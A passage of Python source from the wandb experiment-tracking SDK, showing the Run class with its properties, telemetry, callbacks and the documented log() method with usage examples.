): # we use 0 for non-http errors (eg wandb errors)
wandb.termlog("{}".format(hr.http_response_text))
else:
wandb.termlog(
"{} encountered ({}), retrying request".format(
hr.http_status_code, hr.http_response_text.rstrip()
)
)
join_requested = self._join_event.wait(self._retry_polling_interval)
def check_status(self) -> None:
join_requested = False
while not join_requested:
status_response = self._interface.communicate_stop_status()
if status_response and status_response.run_should_stop:
# TODO(frz): This check is required
# until WB-3606 is resolved on server side.
if not wandb.agents.pyagent.is_running():
thread.interrupt_main()
return
join_requested = self._join_event.wait(self._stop_polling_interval)
def stop(self) -> None:
self._join_event.set()
def join(self) -> None:
self.stop()
self._stop_thread.join()
self._retry_thread.join()
class Run(object):
"""A unit of computation logged by wandb. Typically this is an ML experiment.
Create a run with `wandb.init()`:
<!--yeadoc-test:run-object-basic-->
```python
import wandb
run = wandb.init()
```
There is only ever at most one active `wandb.Run` in any process,
and it is accessible as `wandb.run`:
<!--yeadoc-test:global-run-object-->
```python
import wandb
assert wandb.run is None
wandb.init()
assert wandb.run is not None
```
Anything you log with `wandb.log` will be sent to that run.
If you want to start more runs in the same script or notebook, you'll need to
finish the run that is in-flight. Runs can be finished with `wandb.finish` or
by using them in a `with` block:
<!--yeadoc-test:run-context-manager-->
```python
import wandb
wandb.init()
wandb.finish()
assert wandb.run is None
with wandb.init() as run:
pass # log data here
assert wandb.run is None
```
See the documentation for `wandb.init` for more on creating runs, or check out
[our guide to `wandb.init`](https://docs.wandb.ai/guides/track/launch).
In distributed training, you can either create a single run in the rank 0 process
and then log information only from that process or you can create a run in each process,
logging from each separately, and group the results together with the `group` argument
to `wandb.init`. For more details on distributed training with W&B, check out
[our guide](https://docs.wandb.ai/guides/track/advanced/distributed-training).
Currently there is a parallel `Run` object in the `wandb.Api`. Eventually these
two objects will be merged.
Attributes:
history: (History) Time series values, created with `wandb.log()`.
History can contain scalar values, rich media, or even custom plots
across multiple steps.
summary: (Summary) Single values set for each `wandb.log()` key. By
default, summary is set to the last value logged. You can manually
set summary to the best value, like max accuracy, instead of the
final value.
"""
_telemetry_obj: telemetry.TelemetryRecord
_teardown_hooks: List[TeardownHook]
_tags: Optional[Tuple[Any, ...]]
_entity: Optional[str]
_project: Optional[str]
_group: Optional[str]
_job_type: Optional[str]
_name: Optional[str]
_notes: Optional[str]
_run_obj: Optional[RunRecord]
_run_obj_offline: Optional[RunRecord]
# Use string literal annotation because of type reference loop
_backend: Optional["wandb.sdk.backend.backend.Backend"]
_internal_run_interface: Optional[
Union[
"wandb.sdk.interface.interface_queue.InterfaceQueue",
"wandb.sdk.interface.interface_grpc.InterfaceGrpc",
]
]
_wl: Optional[_WandbSetup]
_upgraded_version_message: Optional[str]
_deleted_version_message: Optional[str]
_yanked_version_message: Optional[str]
_out_redir: Optional[redirect.RedirectBase]
_err_redir: Optional[redirect.RedirectBase]
_redirect_cb: Optional[Callable[[str, str], None]]
_output_writer: Optional["filesystem.CRDedupedFile"]
_quiet: Optional[bool]
_atexit_cleanup_called: bool
_hooks: Optional[ExitHooks]
_exit_code: Optional[int]
_run_status_checker: Optional[RunStatusChecker]
_poll_exit_response: Optional[PollExitResponse]
_sampled_history: Optional[Dict[str, Union[Sequence[int], Sequence[float]]]]
_use_redirect: bool
_stdout_slave_fd: Optional[int]
_stderr_slave_fd: Optional[int]
_artifact_slots: List[str]
_init_pid: int
_iface_pid: Optional[int]
_iface_port: Optional[int]
_attach_id: Optional[str]
_final_summary: Optional[Dict[str, Any]]
def __init__(
self,
settings: Settings,
config: Optional[Dict[str, Any]] = None,
sweep_config: Optional[Dict[str, Any]] = None,
) -> None:
self._config = wandb_config.Config()
self._config._set_callback(self._config_callback)
self._config._set_settings(settings)
self._backend = None
self._internal_run_interface = None
self.summary = wandb_summary.Summary(
self._summary_get_current_summary_callback,
)
self.summary._set_update_callback(self._summary_update_callback)
self.history = wandb_history.History(self)
self.history._set_callback(self._history_callback)
_datatypes_set_callback(self._datatypes_callback)
self._settings = settings
self._wl = None
self._reporter: Optional[Reporter] = None
self._entity = None
self._project = None
self._group = None
self._job_type = None
self._run_id = settings.run_id
self._start_time = time.time()
self._starting_step = 0
self._name = None
self._notes = None
self._tags = None
self._remote_url = None
self._last_commit = None
self._hooks = None
self._teardown_hooks = []
self._redirect_cb = None
self._out_redir = None
self._err_redir = None
self.stdout_redirector = None
self.stderr_redirector = None
self._save_stdout = None
self._save_stderr = None
self._stdout_slave_fd = None
self._stderr_slave_fd = None
self._exit_code = None
self._exit_result = None
self._final_summary = None
self._sampled_history = None
self._jupyter_progress = None
self._quiet = self._settings._quiet
if self._settings._jupyter and ipython.in_jupyter():
self._jupyter_progress = ipython.jupyter_progress_bar()
self._output_writer = None
self._upgraded_version_message = None
self._deleted_version_message = None
self._yanked_version_message = None
self._used_artifact_slots: List[str] = []
# Pull info from settings
self._init_from_settings(settings)
# Initial scope setup for sentry. This might get changed when the
# actual run comes back.
sentry_set_scope(
"user",
entity=self._entity,
project=self._project,
email=self._settings.email,
)
# Returned from backend request_run(), set from wandb_init?
self._run_obj = None
self._run_obj_offline = None
# Created when the run "starts".
self._run_status_checker = None
self._poll_exit_response = None
# Initialize telemetry object
self._telemetry_obj = telemetry.TelemetryRecord()
# Populate config
config = config or dict()
wandb_key = "_wandb"
config.setdefault(wandb_key, dict())
self._launch_artifact_mapping: Dict[str, Any] = {}
self._unique_launch_artifact_sequence_names: Dict[str, Any] = {}
if settings.save_code and settings.program_relpath:
config[wandb_key]["code_path"] = to_forward_slash_path(
os.path.join("code", settings.program_relpath)
)
if sweep_config:
self._config.update_locked(
sweep_config, user="sweep", _allow_val_change=True
)
if (
self._settings.launch
and self._settings.launch_config_path
and os.path.exists(self._settings.launch_config_path)
):
self.save(self._settings.launch_config_path)
with open(self._settings.launch_config_path) as fp:
launch_config = json.loads(fp.read())
if launch_config.get("overrides", {}).get("artifacts") is not None:
for key, item in (
launch_config.get("overrides").get("artifacts").items()
):
self._launch_artifact_mapping[key] = item
artifact_sequence_tuple_or_slot = key.split(":")
if len(artifact_sequence_tuple_or_slot) == 2:
sequence_name = artifact_sequence_tuple_or_slot[0].split("/")[
-1
]
if self._unique_launch_artifact_sequence_names.get(
sequence_name
):
self._unique_launch_artifact_sequence_names.pop(
sequence_name
)
else:
self._unique_launch_artifact_sequence_names[
sequence_name
] = item
launch_run_config = launch_config.get("overrides", {}).get("run_config")
if launch_run_config:
self._config.update_locked(
launch_run_config, user="launch", _allow_val_change=True
)
self._config._update(config, ignore_locked=True)
self._atexit_cleanup_called = False
self._use_redirect = True
self._progress_step = 0
# pid is set so we know if this run object was initialized by this process
self._init_pid = os.getpid()
# interface pid and port configured when backend is configured (See _hack_set_run)
# TODO: using pid isn't the best for windows as pid reuse can happen more often than on unix
self._iface_pid = None
self._iface_port = None
self._attach_id = None
# for now, use runid as attach id, this could/should be versioned in the future
if self._settings._require_service:
self._attach_id = self._settings.run_id
def _set_iface_pid(self, iface_pid: int) -> None:
self._iface_pid = iface_pid
def _set_iface_port(self, iface_port: int) -> None:
self._iface_port = iface_port
def _telemetry_callback(self, telem_obj: telemetry.TelemetryRecord) -> None:
self._telemetry_obj.MergeFrom(telem_obj)
def _freeze(self) -> None:
self._frozen = True
def __setattr__(self, attr: str, value: object) -> None:
if getattr(self, "_frozen", None) and not hasattr(self, attr):
raise Exception("Attribute {} is not supported on Run object.".format(attr))
super(Run, self).__setattr__(attr, value)
def _telemetry_imports(self, imp: telemetry.TelemetryImports) -> None:
telem_map = dict(
pytorch_ignite="ignite", transformers_huggingface="transformers",
)
# calculate mod_map, a mapping from module_name to telem_name
mod_map = dict()
for desc in imp.DESCRIPTOR.fields:
if desc.type != desc.TYPE_BOOL:
continue
telem_name = desc.name
mod_name = telem_map.get(telem_name, telem_name)
mod_map[mod_name] = telem_name
# set telemetry field for every module loaded that we track
mods_set = set(sys.modules)
for mod in mods_set.intersection(mod_map):
setattr(imp, mod_map[mod], True)
def _init_from_settings(self, settings: Settings) -> None:
if settings.entity is not None:
self._entity = settings.entity
if settings.project is not None:
self._project = settings.project
if settings.run_group is not None:
self._group = settings.run_group
if settings.run_job_type is not None:
self._job_type = settings.run_job_type
if settings.run_name is not None:
self._name = settings.run_name
if settings.run_notes is not None:
self._notes = settings.run_notes
if settings.run_tags is not None:
self._tags = settings.run_tags
def _make_proto_run(self, run: RunRecord) -> None:
"""Populate protocol buffer RunData for interface/interface."""
if self._entity is not None:
run.entity = self._entity
if self._project is not None:
run.project = self._project
if self._group is not None:
run.run_group = self._group
if self._job_type is not None:
run.job_type = self._job_type
if self._run_id is not None:
run.run_id = self._run_id
if self._name is not None:
run.display_name = self._name
if self._notes is not None:
run.notes = self._notes
if self._tags is not None:
for tag in self._tags:
run.tags.append(tag)
if self._start_time is not None:
run.start_time.FromSeconds(int(self._start_time))
if self._remote_url is not None:
run.git.remote_url = self._remote_url
if self._last_commit is not None:
run.git.last_commit = self._last_commit
# Note: run.config is set in interface/interface:_make_run()
def _populate_git_info(self) -> None:
try:
repo = GitRepo(remote=self._settings.git_remote, lazy=False)
except Exception:
wandb.termwarn("Cannot find valid git repo associated with this directory.")
return
self._remote_url, self._last_commit = repo.remote_url, repo.last_commit
def __getstate__(self) -> Any:
"""Custom pickler."""
# We only pickle in service mode
if not self._settings or not self._settings._require_service:
return
_attach_id = self._attach_id
if not _attach_id:
return
return dict(_attach_id=_attach_id)
def __setstate__(self, state: Any) -> None:
"""Custom unpickler."""
if not state:
return
_attach_id = state.get("_attach_id")
if not _attach_id:
return
self._attach_id = _attach_id
@property
def settings(self) -> Settings:
"""Returns a frozen copy of run's Settings object."""
cp = self._settings.copy()
cp.freeze()
return cp
@property
def dir(self) -> str:
"""Returns the directory where files associated with the run are saved."""
return self._settings.files_dir
@property
def config(self) -> wandb_config.Config:
"""Returns the config object associated with this run."""
return self._config
@property
def config_static(self) -> wandb_config.ConfigStatic:
return wandb_config.ConfigStatic(self._config)
@property
def name(self) -> Optional[str]:
"""Returns the display name of the run.
Display names are not guaranteed to be unique and may be descriptive.
By default, they are randomly generated.
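Example (a minimal sketch; the name value is a placeholder):
```python
import wandb
run = wandb.init()
run.name = "baseline-lr-0.01"
```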
"""
if self._name:
return self._name
if not self._run_obj:
return None
return self._run_obj.display_name
@name.setter
def name(self, name: str) -> None:
with telemetry.context(run=self) as tel:
tel.feature.set_run_name = True
self._name = name
if self._backend and self._backend.interface:
self._backend.interface.publish_run(self)
@property
def notes(self) -> Optional[str]:
"""Returns the notes associated with the run, if there are any.
Notes can be a multiline string and can also use markdown and latex equations
inside `$$`, like `$$x + 3$$`.
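Example (a minimal sketch; the note text is a placeholder):
```python
import wandb
run = wandb.init()
run.notes = "baseline run, lr=0.01"
```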
"""
if self._notes:
return self._notes
if not self._run_obj:
return None
return self._run_obj.notes
@notes.setter
def notes(self, notes: str) -> None:
self._notes = notes
if self._backend and self._backend.interface:
self._backend.interface.publish_run(self)
@property
def tags(self) -> Optional[Tuple]:
"""Returns the tags associated with the run, if there are any."""
if self._tags:
return self._tags
run_obj = self._run_obj or self._run_obj_offline
if run_obj:
return tuple(run_obj.tags)
return None
@tags.setter
def tags(self, tags: Sequence) -> None:
with telemetry.context(run=self) as tel:
tel.feature.set_run_tags = True
self._tags = tuple(tags)
if self._backend and self._backend.interface:
self._backend.interface.publish_run(self)
@property
def id(self) -> str:
"""Returns the identifier for this run."""
if TYPE_CHECKING:
assert self._run_id is not None
return self._run_id
@property
def sweep_id(self) -> Optional[str]:
"""Returns the ID of the sweep associated with the run, if there is one."""
if not self._run_obj:
return None
return self._run_obj.sweep_id or None
@property
def path(self) -> str:
"""Returns the path to the run.
Run paths include entity, project, and run ID, in the format
`entity/project/run_id`.
"""
parts = []
for e in [self._entity, self._project, self._run_id]:
if e is not None:
parts.append(e)
return "/".join(parts)
@property
def start_time(self) -> float:
"""Returns the unix time stamp, in seconds, when the run started."""
if not self._run_obj:
return self._start_time
else:
return self._run_obj.start_time.ToSeconds()
@property
def starting_step(self) -> int:
"""Returns the first step of the run."""
if not self._run_obj:
return self._starting_step
else:
return self._run_obj.starting_step
@property
def resumed(self) -> bool:
"""Returns True if the run was resumed, False otherwise."""
if self._run_obj:
return self._run_obj.resumed
return False
@property
def step(self) -> int:
"""Returns the current value of the step.
This counter is incremented by `wandb.log`.
"""
return self.history._step
def project_name(self) -> str:
run_obj = self._run_obj or self._run_obj_offline
return run_obj.project if run_obj else ""
@property
def mode(self) -> str:
"""For compatibility with `0.9.x` and earlier, deprecate eventually."""
deprecate.deprecate(
field_name=deprecate.Deprecated.run__mode,
warning_message=(
"The mode property of wandb.run is deprecated "
"and will be removed in a future release."
),
)
return "dryrun" if self._settings._offline else "run"
@property
def offline(self) -> bool:
return self._settings._offline
@property
def disabled(self) -> bool:
return self._settings._noop
@property
def group(self) -> str:
"""Returns the name of the group associated with the run.
Setting a group helps the W&B UI organize runs in a sensible way.
If you are doing distributed training, you should give all of the
runs in the training the same group.
If you are doing cross-validation, you should give all the cross-validation
folds the same group.
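Example (a minimal sketch; the group and job_type values are placeholders):
```python
import wandb
# every worker in the same distributed job shares one group
run = wandb.init(group="experiment-1", job_type="train")
```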
"""
run_obj = self._run_obj or self._run_obj_offline
return run_obj.run_group if run_obj else ""
@property
def job_type(self) -> str:
run_obj = self._run_obj or self._run_obj_offline
return run_obj.job_type if run_obj else ""
@property
def project(self) -> str:
"""Returns the name of the W&B project associated with the run."""
return self.project_name()
def log_code(
self,
root: str = ".",
name: str = None,
include_fn: Callable[[str], bool] = lambda path: path.endswith(".py"),
exclude_fn: Callable[[str], bool] = filenames.exclude_wandb_fn,
) -> Optional[Artifact]:
"""Saves the current state of your code to a W&B Artifact.
By default it walks the current directory and logs all files that end with `.py`.
Arguments:
root: The relative (to `os.getcwd()`) or absolute path to recursively find code from.
name: (str, optional) The name of our code artifact. By default we'll name
the artifact `source-$RUN_ID`. There may be scenarios where you want
many runs to share the same artifact. Specifying name allows you to achieve that.
include_fn: A callable that accepts a file path and
returns True when it should be included and False otherwise. This
defaults to: `lambda path: path.endswith(".py")`
exclude_fn: A callable that accepts a file path and returns `True` when it should be
excluded and `False` otherwise. This defaults to `filenames.exclude_wandb_fn`.
Examples:
Basic usage
```python
run.log_code()
```
Advanced usage
```python
run.log_code("../", include_fn=lambda path: path.endswith(".py") or path.endswith(".ipynb"))
```
Returns:
An `Artifact` object if code was logged
"""
name = name or "{}-{}".format("source", self.id)
art = wandb.Artifact(name, "code")
files_added = False
if root is not None:
root = os.path.abspath(root)
for file_path in filenames.filtered_dir(root, include_fn, exclude_fn):
files_added = True
save_name = os.path.relpath(file_path, root)
art.add_file(file_path, name=save_name)
# Add any manually staged files such as ipynb notebooks
for dirpath, _, files in os.walk(self._settings._tmp_code_dir):
for fname in files:
file_path = os.path.join(dirpath, fname)
save_name = os.path.relpath(file_path, self._settings._tmp_code_dir)
files_added = True
art.add_file(file_path, name=save_name)
if not files_added:
return None
return self.log_artifact(art)
def get_url(self) -> Optional[str]:
"""Returns the url for the W&B run, if there is one.
Offline runs will not have a url.
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_run_url()
def get_project_url(self) -> Optional[str]:
"""Returns the url for the W&B project associated with the run, if there is one.
Offline runs will not have a project url.
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_project_url()
def get_sweep_url(self) -> Optional[str]:
"""Returns the url for the sweep associated with the run, if there is one."""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_sweep_url()
@property
def url(self) -> Optional[str]:
"""Returns the W&B url associated with the run."""
return self.get_url()
@property
def entity(self) -> str:
"""Returns the name of the W&B entity associated with the run.
Entity can be a user name or the name of a team or organization.
"""
return self._entity or ""
def _label_internal(
self, code: str = None, repo: str = None, code_version: str = None
) -> None:
with telemetry.context(run=self) as tel:
if code and RE_LABEL.match(code):
tel.label.code_string = code
if repo and RE_LABEL.match(repo):
tel.label.repo_string = repo
if code_version and RE_LABEL.match(code_version):
tel.label.code_version = code_version
def _label(
self,
code: str = None,
repo: str = None,
code_version: str = None,
**kwargs: str,
) -> None:
if self._settings.label_disable:
return
for k, v in (("code", code), ("repo", repo), ("code_version", code_version)):
if v and not RE_LABEL.match(v):
wandb.termwarn(
"Label added for '{}' with invalid identifier '{}' (ignored).".format(
k, v
),
repeat=False,
)
for v in kwargs:
wandb.termwarn(
"Label added for unsupported key '{}' (ignored).".format(v),
repeat=False,
)
self._label_internal(code=code, repo=repo, code_version=code_version)
# update telemetry in the backend immediately for _label() callers
if self._backend and self._backend.interface:
self._backend.interface._publish_telemetry(self._telemetry_obj)
def _label_probe_lines(self, lines: List[str]) -> None:
if not lines:
return
parsed = telemetry._parse_label_lines(lines)
if not parsed:
return
label_dict = {}
code = parsed.get("code") or parsed.get("c")
if code:
label_dict["code"] = code
repo = parsed.get("repo") or parsed.get("r")
if repo:
label_dict["repo"] = repo
code_ver = parsed.get("version") or parsed.get("v")
if code_ver:
label_dict["code_version"] = code_ver
self._label_internal(**label_dict)
def _label_probe_main(self) -> None:
m = sys.modules.get("__main__")
if not m:
return
doc = getattr(m, "__doc__", None)
if not doc:
return
doclines = doc.splitlines()
self._label_probe_lines(doclines)
# TODO: annotate jupyter Notebook class
def _label_probe_notebook(self, notebook: Any) -> None:
logger.info("probe notebook")
lines = None
try:
data = notebook.probe_ipynb()
cell0 = data.get("cells", [])[0]
lines = cell0.get("source")
# kaggle returns a string instead of a list
if isinstance(lines, str):
lines = lines.split()
except Exception as e:
logger.info("Unable to probe notebook: {}".format(e))
return
if lines:
self._label_probe_lines(lines)
def display(self, height: int = 420, hidden: bool = False) -> bool:
"""Displays this run in jupyter."""
if self._settings._jupyter and ipython.in_jupyter():
ipython.display_html(self.to_html(height, hidden))
return True
else:
wandb.termwarn(".display() only works in jupyter environments")
return False
def to_html(self, height: int = 420, hidden: bool = False) -> str:
"""Generates HTML containing an iframe displaying the current run."""
url = self._get_run_url() + "?jupyter=true"
style = f"border:none;width:100%;height:{height}px;"
prefix = ""
if hidden:
style += "display:none;"
prefix = ipython.toggle_button()
return prefix + f'<iframe src="{url}" style="{style}"></iframe>'
def _repr_mimebundle_(
self, include: Any = None, exclude: Any = None
) -> Dict[str, str]:
return {"text/html": self.to_html(hidden=True)}
def _config_callback(
self,
key: Union[Tuple[str, ...], str] = None,
val: Any = None,
data: Dict[str, object] = None,
) -> None:
logger.info("config_cb %s %s %s", key, val, data)
if not self._backend or not self._backend.interface:
return
self._backend.interface.publish_config(key=key, val=val, data=data)
def _set_config_wandb(self, key: str, val: Any) -> None:
self._config_callback(key=("_wandb", key), val=val)
def _summary_update_callback(self, summary_record: SummaryRecord) -> None:
if self._backend and self._backend.interface:
self._backend.interface.publish_summary(summary_record)
def _summary_get_current_summary_callback(self) -> Dict[str, Any]:
if not self._backend or not self._backend.interface:
return {}
ret = self._backend.interface.communicate_get_summary()
if not ret:
return {}
return proto_util.dict_from_proto_list(ret.item)
def _metric_callback(self, metric_record: MetricRecord) -> None:
if self._backend and self._backend.interface:
self._backend.interface._publish_metric(metric_record)
def _datatypes_callback(self, fname: str) -> None:
if not self._backend or not self._backend.interface:
return
files = dict(files=[(glob.escape(fname), "now")])
self._backend.interface.publish_files(files)
# TODO(jhr): codemod add: PEP 3102 -- Keyword-Only Arguments
def _history_callback(self, row: Dict[str, Any], step: int) -> None:
# TODO(jhr): move visualize hack somewhere else
custom_charts = {}
for k in row:
if isinstance(row[k], Visualize):
config = {
"id": row[k].viz_id,
"historyFieldSettings": {"key": k, "x-axis": "_step"},
}
row[k] = row[k].value
self._config_callback(val=config, key=("_wandb", "viz", k))
elif isinstance(row[k], CustomChart):
custom_charts[k] = row[k]
custom_chart = row[k]
for k, custom_chart in custom_charts.items():
# remove the chart key from the row
# TODO: is this really the right move? what if the user logs
# a non-custom chart to this key?
row.pop(k)
# add the table under a different key
table_key = k + "_table"
row[table_key] = custom_chart.table
# add the panel
panel_config = custom_chart_panel_config(custom_chart, k, table_key)
self._add_panel(k, "Vega2", panel_config)
if self._backend and self._backend.interface:
not_using_tensorboard = len(wandb.patched["tensorboard"]) == 0
self._backend.interface.publish_history(
row, step, publish_step=not_using_tensorboard
)
def _console_callback(self, name: str, data: str) -> None:
# logger.info("console callback: %s, %s", name, data)
if self._backend and self._backend.interface:
self._backend.interface.publish_output(name, data)
def _tensorboard_callback(
self, logdir: str, save: bool = None, root_logdir: str = None
) -> None:
logger.info("tensorboard callback: %s, %s", logdir, save)
save = True if save is None else save
if self._backend and self._backend.interface:
self._backend.interface.publish_tbdata(logdir, save, root_logdir)
def _set_library(self, library: _WandbSetup) -> None:
self._wl = library
def _set_backend(self, backend: "wandb.sdk.backend.backend.Backend") -> None:
self._backend = backend
def _set_internal_run_interface(
self,
interface: Union[
"wandb.sdk.interface.interface_queue.InterfaceQueue",
"wandb.sdk.interface.interface_grpc.InterfaceGrpc",
],
) -> None:
self._internal_run_interface = interface
def _set_reporter(self, reporter: Reporter) -> None:
self._reporter = reporter
def _set_teardown_hooks(self, hooks: List[TeardownHook]) -> None:
self._teardown_hooks = hooks
def _set_run_obj(self, run_obj: RunRecord) -> None:
self._run_obj = run_obj
self._entity = run_obj.entity
self._project = run_obj.project
# Grab the config from resuming
if run_obj.config:
c_dict = config_util.dict_no_value_from_proto_list(run_obj.config.update)
# TODO: Windows throws a wild error when this is set...
if "_wandb" in c_dict:
del c_dict["_wandb"]
# We update the config object here without triggering the callback
self.config._update(c_dict, allow_val_change=True, ignore_locked=True)
# Update the summary, this will trigger an un-needed graphql request :(
if run_obj.summary:
summary_dict = {}
for orig in run_obj.summary.update:
summary_dict[orig.key] = json.loads(orig.value_json)
self.summary.update(summary_dict)
self.history._update_step()
# TODO: It feels weird to call this twice..
sentry_set_scope(
"user",
entity=run_obj.entity,
project=run_obj.project,
email=self._settings.email,
url=self._get_run_url(),
)
def _set_run_obj_offline(self, run_obj: RunRecord) -> None:
self._run_obj_offline = run_obj
def _add_singleton(
self, data_type: str, key: str, value: Dict[Union[int, str], str]
) -> None:
"""Stores a singleton item to wandb config.
A singleton in this context is a piece of data that is continually
logged with the same value in each history step, but represented
as a single item in the config.
We do this to avoid filling up history with a lot of repeated, unnecessary data.
Add singleton can be called many times in one run and it will only be
updated when the value changes. The last value logged will be the one
persisted to the server.
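Example of the resulting config entry (an illustrative sketch; the
data_type, key, and value are hypothetical):
```python
# run._add_singleton("system", "gpu", {0: "Tesla V100"}) stores:
# run.config["_wandb"]["system"]["gpu"] == {
#     "type": "system", "key": "gpu", "value": {0: "Tesla V100"}
# }
```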
"""
value_extra = {"type": data_type, "key": key, "value": value}
if data_type not in self.config["_wandb"]:
self.config["_wandb"][data_type] = {}
if key in self.config["_wandb"][data_type]:
old_value = self.config["_wandb"][data_type][key]
else:
old_value = None
if value_extra != old_value:
self.config["_wandb"][data_type][key] = value_extra
self.config.persist()
def log(
self,
data: Dict[str, Any],
step: int = None,
commit: bool = None,
sync: bool = None,
) -> None:
"""Logs a dictonary of data to the current run's history.
Use `wandb.log` to log data from runs, such as scalars, images, video,
histograms, plots, and tables.
See our [guides to logging](https://docs.wandb.ai/guides/track/log) for
live examples, code snippets, best practices, and more.
The most basic usage is `wandb.log({"train-loss": 0.5, "accuracy": 0.9})`.
This will save the loss and accuracy to the run's history and update
the summary values for these metrics.
Visualize logged data in the workspace at [wandb.ai](https://wandb.ai),
or locally on a [self-hosted instance](https://docs.wandb.ai/self-hosted)
of the W&B app, or export data to visualize and explore locally, e.g. in
Jupyter notebooks, with [our API](https://docs.wandb.ai/guides/track/public-api-guide).
In the UI, summary values show up in the run table to compare single values across runs.
Summary values can also be set directly with `wandb.run.summary["key"] = value`.
Logged values don't have to be scalars. Logging any wandb object is supported.
For example `wandb.log({"example": wandb.Image("myimage.jpg")})` will log an
example image which will be displayed nicely in the W&B UI.
See the [reference documentation](https://docs.wandb.com/library/reference/data_types)
for all of the different supported types or check out our
[guides to logging](https://docs.wandb.ai/guides/track/log) for examples,
from 3D molecular structures and segmentation masks to PR curves and histograms.
`wandb.Table`s can be used to log structured data. See our
[guide to logging tables](https://docs.wandb.ai/guides/data-vis/log-tables)
for details.
Logging nested metrics is encouraged and is supported in the W&B UI.
If you log with a nested dictionary like `wandb.log({"train":
{"acc": 0.9}, "val": {"acc": 0.8}})`, the metrics will be organized into
`train` and `val` sections in the W&B UI.
wandb keeps track of a global step, which by default increments with each
call to `wandb.log`, so logging related metrics together is encouraged.
If it's inconvenient to log related metrics together,
calling `wandb.log({"train-loss": 0.5}, commit=False)` and then
`wandb.log({"accuracy": 0.9})` is equivalent to calling
`wandb.log({"train-loss": 0.5, "accuracy": 0.9})`.
`wandb.log` is not intended to be called more than a few times per second.
If you want to log more frequently than that it's better to aggregate
the data on the client side or you may get degraded performance.
Arguments:
data: (dict, optional) A dict of serializable python objects i.e. `str`,
`ints`, `floats`, `Tensors`, `dicts`, or any of the `wandb.data_types`.
commit: (boolean, optional) Save the metrics dict to the wandb server
and increment the step. If false `wandb.log` just updates the current
metrics dict with the row argument and metrics won't be saved until
`wandb.log` is called with `commit=True`.
step: (integer, optional) The global step in processing. This persists
any non-committed earlier steps but defaults to not committing the
specified step.
sync: (boolean, optional) This argument is deprecated and currently doesn't
change the behaviour of `wandb.log`.
Examples:
For more detailed examples, see
[our guides to logging](https://docs.wandb.com/guides/track/log).
### Basic usage
<!--yeadoc-test:init-and-log-basic-->
```python
import wandb
wandb.init()
wandb.log({'accuracy': 0.9, 'epoch': 5})
```
### Incremental logging
<!--yeadoc-test:init-and-log-incremental-->
```python
import wandb
wandb.init()
wandb.log({'loss': 0.2}, commit=False)
# Somewhere else when I'm ready to report this step:
wandb.log({'accuracy': 0.8})
```
### Histogram
<!--yeadoc-test:init-and-log-histogram-->
```python
import numpy as np
import wandb
# sample gradients at random from normal distribution
gradients = np.random.randn(100, 100)
wandb.init()
wandb.log({"gradients": wandb.Histogram(gradients)})
```
### Image from numpy
<!--yeadoc-test:init-and-log-image-numpy-->
```python
import numpy as np
import wandb
wandb.init()
examples = []
for i in range(3):
pixels = np.random.randint(low=0, high=256, size=(100, 100, 3))
image = wandb.Image(pixels, caption=f"random field {i}")
examples.append(image)
wandb.log({"examples": examples})
```
### Image from PIL
<!--yeadoc-test:init-and-log-image-pillow-->
```python
import numpy as np
from PIL import Image as PILImage
import wandb
wandb.init()
examples = []
for i in range(3):
pixels = np.random.randint(low=0, high=256, size=(100, 100, 3), dtype=np.uint8)
pil_image = PILImage.fromarray(pixels, mode="RGB")
image = wandb.Image(pil_image, caption=f"random field {i}")
examples.append(image)
wandb.log({"examples": examples})
```
### Video from numpy
<!--yeadoc-test:init-and-log-video-numpy-->
```python
import numpy as np
import wandb
wandb.init()
# axes are (time, channel, height, width)
frames = np.random.randint(low=0, high=256, size=(10, 3, 100, 100), dtype=np.uint8)
wandb.log({"video": wandb.Video(frames, fps=4)})
```
### Matplotlib Plot
<!--yeadoc-test:init-and-log-matplotlib-->
```python
from matplotlib import pyplot as plt
import numpy as np
import wandb
wandb.init()
fig, ax = plt.subplots()
x = np.linspace(0, 10)
y = x * x
ax.plot(x, y) # plot y = x^2
wandb.log({"chart": fig})
```
### PR Curve
```python
wandb.log({'pr': wandb.plots.precision_recall(y_test, y_probas, labels)})
```
### 3D Object
```python
wandb.log({"generated_samples":
[wandb.Object3D(open("sample.obj")),
wandb.Object3D(open("sample.gltf")),
wandb.Object3D(open("sample.glb"))]})
```
Raises:
wandb.Error: if called before `wandb.init`
ValueError: if invalid data is passed
"""
if not self._settings._require_service:
current_pid = os.getpid()
if current_pid != self._init_pid:
message = "log() ignored (called from pid={}, init called from pid={}). See: https://docs.wandb.ai/library/init#multiprocess".format(
current_pid, self._init_pid
)
if self._settings._strict:
wandb.termerror(message, repeat=False)
raise errors.LogMultiprocessError(
"log() does not support multiprocessing"
)
wandb.termwarn(message, repeat=False)
return
if not isinstance(data, Mapping):
raise ValueError("wandb.log must be passed a dictionary")
if any(not isinstance(key, string_types) for key in data.keys()):
raise ValueError("Key values passed to `wandb.log` must be strings.")
if step is not None:
# if step is passed in when tensorboard_sync is used we honor the step passed
# to make decisions about how to close out the history record, but will strip
# this history later on in publish_history()
using_tensorboard = len(wandb.patched["tensorboard"]) > 0
if using_tensorboard:
wandb.termwarn(
"Step cannot be set when using syncing with tensorboard. Please log your step values as a metric such as 'global_step'",
repeat=False,
)
if self.history._step > step:
wandb.termwarn(
(
"Step must only increase in log calls. "
"Step {} < {}; dropping {}.".format(
step, self.history._step, data
)
)
)
return
elif step > self.history._step:
self.history._flush()
self.history._step = step
elif commit is None:
commit = True
if commit:
self.history._row_add(data)
else:
self.history._row_update(data)
def save(
self,
glob_str: Optional[str] = None,
base_path: Optional[str] = None,
policy: str = "live",
) -> Union[bool, List[str]]:
"""Ensure all files matching `glob_str` are synced to wandb with the policy specified.
Arguments:
glob_str: (string) a relative or absolute path to a unix glob or regular
path. If this isn't specified the method is a noop.
base_path: (string) the base path to run the glob relative to
policy: (string) one of `live`, `now`, or `end`
- live: upload the file as it changes, overwriting the previous version
- now: upload the file once now
- end: only upload file when the run ends
"""
if glob_str is None:
# noop for historical reasons, run.save() may be called in legacy code
deprecate.deprecate(
field_name=deprecate.Deprecated.run__save_no_args,
warning_message=(
"Calling wandb.run.save without any arguments is deprecated."
"Changes to attributes are automatically persisted."
),
)
return True
if policy not in ("live", "end", "now"):
raise ValueError(
'Only "live" "end" and "now" policies are currently supported.'
)
if isinstance(glob_str, bytes):
glob_str = glob_str.decode("utf-8")
if not isinstance(glob_str, string_types):
raise ValueError("Must call wandb.save(glob_str) with glob_str a str")
if base_path is None:
if os.path.isabs(glob_str):
